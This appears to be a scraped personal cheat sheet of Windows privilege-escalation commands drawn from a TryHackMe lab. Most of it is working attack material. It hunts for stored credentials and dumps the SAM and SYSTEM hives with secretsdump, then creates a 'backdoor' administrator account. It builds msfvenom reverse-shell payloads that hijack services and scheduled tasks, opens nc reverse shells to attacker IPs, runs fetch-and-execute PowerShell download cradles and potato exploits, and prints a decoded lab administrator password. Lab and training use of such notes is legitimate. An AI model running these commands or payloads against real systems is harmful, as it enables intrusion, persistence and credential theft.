Windows
Last updated
Last updated
Copy info from here: https://tryhackme.com/room/windowsprivesc20
whoami /privnet usersysteminfosysteminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"dir c:\dir "c:\program files"dir "c:\program files (x86)"wmic service get name,startnamewmic service get name,pathname,startname | findstr "Program Files"Find text in file
type C:\Windows\path\to\file\$FILE | findstr $STRINGFind passwords
reg query HKLM /f password /t REG_SZ /sSeImpersonatePrivilege
Printspoofer - works on Windows 10 and Server 2016/2019
SeImpersonatePrivilege
Using EfsPotato
Might be able to find interesting files by looking at what was recently accessed. Start -> run -> recent.
Examples
Victim(cmd)
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txtExamples
Need GUI to see other command prompt that will be spawned
Victim(cmd)
cmdkey /list
runas /savecred /user:$DOMAIN\$USERNAME cmd.exeExamples
Retrieve the saved password stored in the saved PuTTY session under your profile.
Victim(cmd)
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /sExamples
Examples
Kali(WinRM)
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bakExamples
Kali
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCALVictim
net user backdoor pass!123 /add
net localgroup Administrators backdoor /add
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /fVictim
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fExamples
Add user to group that allows them to RDP
Victim(cmd)
net localgroup "Remote Management Users" $USER /addExamples
Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it's using a binary you can modify.
Scheduled tasks can be listed from the command line using the schtasks command without any options. To retrieve detailed information about any of the services, you can use a command like the following one:
Victim(cmd)
schtasks Victim(cmd)
schtasks /query /tn $TASK /fo list /vVictim(cmd)
icacls c:\tasks\schtask.batKali
nc -lvnp 4444Victim
echo c:\tools\nc64.exe -e cmd.exe $KALI 4444 > C:\tasks\schtask.bat
schtasks /run /tn $TASK Examples
Get the flag on svcusr1's desktop
Victim(cmd)
sc qc WindowsSchedulerVictim(cmd)
icacls C:\PROGRA~2\SYSTEM~1\WService.exeKali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4445 -f exe-service -o rev-svc.exe
python2 -m SimpleHTTPServer 81Victim(Powershell)
wget http://$KALI:81/rev-svc.exe -O rev-svc.exeOnce the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the Everyone group as well.
Victim(Powershell)
cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:FKali
nc -lvp 4445Note: PowerShell has sc as an alias to Set-Content, therefore you need to use sc.exe in order to control services with PowerShell this way.
As a result, you'll get a reverse shell with svcusr1 privileges:
Victim(cmd)
sc stop windowsscheduler
sc start windowsschedulerOR
Victim(Powershell)
sc.exe stop windowsscheduler
sc.exe start windowsschedulerExamples
Victim(cmd)
sc qc "disk sorter enterprise"Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4446 -f exe-service -o rev-svc2.exe
python2 -m SimpleHTTPServer 81Victim(Powershell)
wget http://10.10.15.215:81/rev-svc2.exe -O rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:FKali
nc -lvp 4446Victim(cmd)
sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise"Examples
Victim(cmd)
cd C:\tools\AccessChk
accesschk64.exe -qlc thmserviceKali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4447 -f exe-service -o rev-svc3.exe
python2 -m SimpleHTTPServer 81Victim(Powershell)
wget http://10.10.15.215:81/rev-svc3.exe -O rev-svc3.exeKali
nc -lvp 4447Victim(Powershell)
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
sc.exe config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc.exe stop THMService
sc.exe start THMServiceExamples
Kali
nc -lvp 4442Victim(Browser)
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.10.22.165 4442"Examples:
Examples:
Load PowerUp.ps1 into memory.
Kali
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 81Add the following line at the bottom to PowerUp.ps1 so it Invokes all checks automatically once downloaded
PowerUp.ps1
Invoke-AllChecksVictim(powershell)
powershell -ep bypass
iex​(New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1') Kali
echo "dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=" | base64 -dKali
xfreerdp +clipboard /u:"Administrator" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$TWinPeas
PowerUp.ps1
Windows Exploit Suggester
SharpHound
Powerview
Examples
Download Juicy Potato to your attack machine
Upload Juicy Potato to the target (ex: via FTP, SMB, HTTP, etc.)
Create a reverse shell and upload it to the target (ex: via FTP, SMB, HTTP, etc.) use Juicy Potato to execute your reverse shell
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exeJuicyPotato.exe -l 5050 -p C:\path\to\reverse-shell.exe -t *Examples
Setup
Kali
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
python2 -m SimpleHTTPServer 81Victim(cmd)
certutil -urlcache -f http://10.10.228.214:81/PowerUp.ps1 PowerUp.ps1
. .\PowerUp.ps1
Invoke-AllChecksOR
Victim(powershell)
powershell -ep bypass
iex​(New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1')Examples
Setup
Run command then paste output back to Kali in a file called systeminfo.txt
Victim
systeminfoKali
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester/
python3.9 windows-exploit-suggester.py --update
python3.9 windows-exploit-suggester2.py --database 2022-12-03-mssb.xls --systeminfo systeminfo.txtExamples
Setup
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221127/winPEASx64.exe
python2 -m SimpleHTTPServer 82Victim
cd C:\Windows\Temp
powershell "(New-Object System.Net.WebClient).Downloadfile('http://$KALI:82/winPEASx64.exe','winPEASx64.exe')"
winPEASx64.exeExamples
Add this line to SharpHound.ps1 before transferring so I could run the command right away
Victim
powershell -ep bypass
.\SharpHound.ps1Kali
apt-get install bloodhound
neo4j console
bloodhound --no-sandboxExamples
Victim
Run below to be able to run PowerView commands.
powershell -ep bypass
. .\Downloads\PowerView.ps1Enumerate the domain users.
Get-NetUser | select cnEnumerate the domain groups.
Get-NetGroup -GroupName *admin*Find Shared folders.
Invoke-ShareFinderGet Operating systems on the network.
Get-NetComputer -fulldata | select operatingsystemgit clone https://github.com/BloodHoundAD/BloodHound.git
